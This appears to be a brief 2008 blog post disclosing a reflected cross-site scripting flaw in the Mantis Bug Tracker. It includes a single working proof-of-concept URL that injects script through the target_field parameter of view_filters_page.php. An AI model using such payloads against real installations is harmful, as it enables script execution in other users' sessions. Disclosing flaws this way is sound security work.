Mantis Bug Tracker XSS

March 1st, 2008  | Tags: , ,

‘Mantis is a free popular web-based bugtracking system’ - http://www.mantisbt.org/

I didn’t audit this, I don’t want to audit this, I just found it while using Mantis. There may be more, but this is what I got:

/view_filters_page.php?for_screen=1&target_field=show_category[]%22;alert(1);x=%22
Share and Enjoy:
  • Facebook
  • Digg
  • del.icio.us
  • StumbleUpon
  • LinkedIn
  • Google
  • Reddit
  • Slashdot
  • Technorati
  • TwitThis
  • Pownce
  • E-mail this story to a friend!
  • Print this article!
  • Ma.gnolia
Leave a comment | Trackback
« Quick Update Oh yea, I have a blog… »
No comments yet.
TOP